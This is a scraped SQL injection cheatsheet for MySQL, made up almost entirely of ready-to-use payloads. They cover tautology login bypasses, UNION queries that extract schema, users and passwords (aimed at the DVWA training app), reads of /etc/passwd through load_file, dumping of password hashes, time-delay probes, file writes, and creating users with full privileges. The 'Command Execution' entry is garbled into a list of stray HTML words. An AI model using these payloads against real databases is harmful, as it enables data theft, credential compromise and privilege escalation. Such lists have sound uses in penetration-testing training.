SQL Injection Cheatsheet

SQL Injection Cheatsheet

'
' or '1=1 #

'OR '1'='1' -- ';

1' order by 1 #

2' order by 1 #

3' order by 1 #

4' order by 1 #

5' order by 1 #

1' or 1=1 order by 1 #

SELECT @@hostname; ' and 1=1 union select database(),version() #
' union SELECT 1, @@version #

' and 1=1 union select null,user() #

' union SELECT 1, user() #

' and 1=1 union select null,table_schema from information_schema.tables #

' and 1=1 union select table_name,table_schema from information_schema.tables #

' and 1=1 union select table_name,table_schema from information_schema.tables where table_schema='dvwa' #

' and 1=1 union select table_name,column_name from information_schema.columns where table_schema='dvwa' #

' and 1=1 union select first_name,password from dvwa.users #

' union SELECT 1, load_file('/etc/hosts') #

' union SELECT 1, load_file('/etc/passwd') #

' union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' #

' union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'user_id' #

' union select user, password FROM users #


VersionSELECT @@version

CommentsSELECT 1; #comment
SELECT /*comment*/1;

Current UserSELECT user();
SELECT system_user();

List UsersSELECT user FROM mysql.user; — priv

List Password Hashes
 SELECT host, user, password FROM mysql.user; — priv

Password CrackerJohn the Ripper will crack MySQL password hashes.

List PrivilegesSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns



List DBA AccountsSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv



Current DatabaseSELECT database()


List DatabasesSELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv

List ColumnsSELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’


List TablesSELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’


Find Tables From Column NameSELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’



Select Nth RowSELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0



Select Nth CharSELECT substr(‘abcd’, 3, 1); # returns c


Bitwise ANDSELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0


ASCII Value -> CharSELECT char(65); # returns A


Char -> ASCII ValueSELECT ascii(‘A’); # returns 65

Casting SELECT cast(’1' AS unsigned integer);
SELECT cast(’123' AS char);

String ConcatenationSELECT CONCAT(‘A’,'B’); #returns AB
SELECT CONCAT(‘A’,'B’,'C’); # returns ABC


If StatementSELECT if(1=1,’foo’,'bar’); — returns ‘foo’

Case StatementSELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A


Avoiding QuotesSELECT 0×414243; # returns ABCTime DelaySELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12



Make DNS RequestsImpossible?



Command ExecutionIf mysqld (<5 .0="" .so="" a="" about="" account="" and="" architecture="" as="" attack="" be="" by="" can="" commands="" compile="" compromise="" contain="" dba="" defined="" exactly="" execute="" explains="" file="" for="" function="" go="" how="" into="" is="" lib="" may="" nbsp="" not="" object="" or="" os="" p="" platform.="" raptor_udf.c="" remember="" root="" running="" same="" shared="" should="" similar="" target="" the="" this.="" to="" uploading="" user="" usr="" which="" you="" your="">


Local File Access…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv,

 write to file systemHostname, IP AddressSELECT @@hostname;Create UsersCREATE USER test1 IDENTIFIED BY ‘pass1'; — priv

Delete UsersDROP USER test1; — priv

Make User DBAGRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv

Location of DB filesSELECT @@datadir;


Default/System Databasesinformation_schema (>= mysql 5.0)
mysql